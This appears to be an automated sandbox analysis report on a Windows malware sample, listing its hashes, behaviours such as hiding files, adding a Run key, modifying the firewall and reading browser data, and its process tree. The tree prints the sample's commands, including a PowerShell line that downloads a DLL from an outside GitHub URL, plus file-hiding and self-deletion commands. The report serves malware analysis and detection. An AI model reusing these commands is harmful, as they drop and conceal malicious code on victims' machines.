Analysis

  • max time kernel
    359s
  • max time network
    363s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2023 23:07

General

  • Target

    Client3245tt3q45.exe

  • Size

    29KB

  • MD5

    85253b35dcea8e7131541bd1ede1f686

  • SHA1

    6c69103a6719fd3c612d992e56eb863b025d7433

  • SHA256

    801f056a0d6fa25b60627d51f5c8ef3ad818d7250e7c0d3688b3bcd7e6cba893

  • SHA512

    e1fb5c89c78a9ce1cccbecc236b9dd6c16affe5d78b652e9b19b8fb1df43b4c2956ccc864e872d99ed067d3e83f1ed8731586dc38966246132c31a7c1d5813f8

  • SSDEEP

    768:GecUMOOo5HCljU0rDdIA/MDMAP79xt3C2hGXbGjD:5MON5KIAUDdT973C2hObg

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/NGROKC/CTC/raw/main/CTC64.dll

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe
    "C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe"
        3⤵
        • Sets file to hidden
        • Views/modifies file attributes
        PID:2248
    • C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\System32\explorer.exe" C:\ProgramData\$77-.exe
      2⤵
        PID:2988
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\ProgramData\$77-.exe
        "C:\ProgramData\$77-.exe"
        2⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3056
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c attrib +s +h +r "C:\ProgramData\$77-.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2752
          • C:\Windows\SysWOW64\attrib.exe
            attrib +s +h +r "C:\ProgramData\$77-.exe"
            4⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:2760
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2608
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\ProgramData\\r77-x64.dll');exit
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2556
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\SInject1.exe"&exit
          3⤵
          • Modifies Windows Firewall
          PID:2904
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c ping 0 -n 2 & del "C:\ProgramData\$77-.lnk"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2788
          • C:\Windows\SysWOW64\PING.EXE
            ping 0 -n 2
            4⤵
            • Runs ping.exe
            PID:1376
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall delete allowedprogram "C:\ProgramData\$77-.exe"
          3⤵
          • Modifies Windows Firewall
          PID:2796
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c ping 0 -n 2 & del "C:\ProgramData\$77-.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1592
          • C:\Windows\SysWOW64\PING.EXE
            ping 0 -n 2
            4⤵
            • Runs ping.exe
            PID:1680
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c ping 0 -n 2 & del "C:\ProgramData\$77-.lnk"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:284
          • C:\Windows\SysWOW64\PING.EXE
            ping 0 -n 2
            4⤵
            • Runs ping.exe
            PID:1600

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\$77-.exe

      Filesize

      29KB

      MD5

      85253b35dcea8e7131541bd1ede1f686

      SHA1

      6c69103a6719fd3c612d992e56eb863b025d7433

      SHA256

      801f056a0d6fa25b60627d51f5c8ef3ad818d7250e7c0d3688b3bcd7e6cba893

      SHA512

      e1fb5c89c78a9ce1cccbecc236b9dd6c16affe5d78b652e9b19b8fb1df43b4c2956ccc864e872d99ed067d3e83f1ed8731586dc38966246132c31a7c1d5813f8

    • C:\ProgramData\$77-.exe

      Filesize

      29KB

      MD5

      85253b35dcea8e7131541bd1ede1f686

      SHA1

      6c69103a6719fd3c612d992e56eb863b025d7433

      SHA256

      801f056a0d6fa25b60627d51f5c8ef3ad818d7250e7c0d3688b3bcd7e6cba893

      SHA512

      e1fb5c89c78a9ce1cccbecc236b9dd6c16affe5d78b652e9b19b8fb1df43b4c2956ccc864e872d99ed067d3e83f1ed8731586dc38966246132c31a7c1d5813f8

    • C:\Users\Admin\AppData\Local\Temp\Rot.bat

      Filesize

      235B

      MD5

      fa2df82470638d18f85bc54dd7f001aa

      SHA1

      eae60eab30561b413dba2924782a858722c0ecbe

      SHA256

      ab41cefaca31b47651bcc22adf49d17a7fe094bcee8ee1cdc4d60ad4c6b5a604

      SHA512

      f17f20809c2a7f89925171d07fa3a4c7215274595e0eb2de8ce50ae466120ead7355224a1a830a023ac2a0abcb0c1932221d3c2c880b797d7bbb4bc5445326aa

    • C:\Users\Admin\AppData\Local\Temp\Rot.bat

      Filesize

      235B

      MD5

      fa2df82470638d18f85bc54dd7f001aa

      SHA1

      eae60eab30561b413dba2924782a858722c0ecbe

      SHA256

      ab41cefaca31b47651bcc22adf49d17a7fe094bcee8ee1cdc4d60ad4c6b5a604

      SHA512

      f17f20809c2a7f89925171d07fa3a4c7215274595e0eb2de8ce50ae466120ead7355224a1a830a023ac2a0abcb0c1932221d3c2c880b797d7bbb4bc5445326aa

    • memory/2428-1-0x0000000073F10000-0x00000000745FE000-memory.dmp

      Filesize

      6.9MB

    • memory/2428-3-0x0000000073F10000-0x00000000745FE000-memory.dmp

      Filesize

      6.9MB

    • memory/2428-0-0x00000000000E0000-0x00000000000EE000-memory.dmp

      Filesize

      56KB

    • memory/2556-23-0x0000000002560000-0x00000000025A0000-memory.dmp

      Filesize

      256KB

    • memory/2556-25-0x000000006F780000-0x000000006FD2B000-memory.dmp

      Filesize

      5.7MB

    • memory/2556-24-0x0000000002560000-0x00000000025A0000-memory.dmp

      Filesize

      256KB

    • memory/2556-21-0x000000006F780000-0x000000006FD2B000-memory.dmp

      Filesize

      5.7MB

    • memory/2556-22-0x000000006F780000-0x000000006FD2B000-memory.dmp

      Filesize

      5.7MB

    • memory/3056-7-0x0000000073E40000-0x000000007452E000-memory.dmp

      Filesize

      6.9MB

    • memory/3056-32-0x0000000005B80000-0x0000000005C14000-memory.dmp

      Filesize

      592KB

    • memory/3056-6-0x00000000000C0000-0x00000000000CE000-memory.dmp

      Filesize

      56KB

    • memory/3056-26-0x0000000073E40000-0x000000007452E000-memory.dmp

      Filesize

      6.9MB

    • memory/3056-27-0x0000000001DE0000-0x0000000001DEE000-memory.dmp

      Filesize

      56KB

    • memory/3056-28-0x00000000045A0000-0x00000000045AA000-memory.dmp

      Filesize

      40KB

    • memory/3056-31-0x0000000005AE0000-0x0000000005B78000-memory.dmp

      Filesize

      608KB

    • memory/3056-9-0x0000000005610000-0x0000000005650000-memory.dmp

      Filesize

      256KB

    • memory/3056-34-0x0000000004910000-0x000000000491C000-memory.dmp

      Filesize

      48KB

    • memory/3056-35-0x0000000001E20000-0x0000000001E2C000-memory.dmp

      Filesize

      48KB

    • memory/3056-36-0x0000000005610000-0x0000000005650000-memory.dmp

      Filesize

      256KB

    • memory/3056-37-0x0000000005610000-0x0000000005650000-memory.dmp

      Filesize

      256KB

    • memory/3056-38-0x0000000001E10000-0x0000000001E1A000-memory.dmp

      Filesize

      40KB

    • memory/3056-39-0x0000000073E40000-0x000000007452E000-memory.dmp

      Filesize

      6.9MB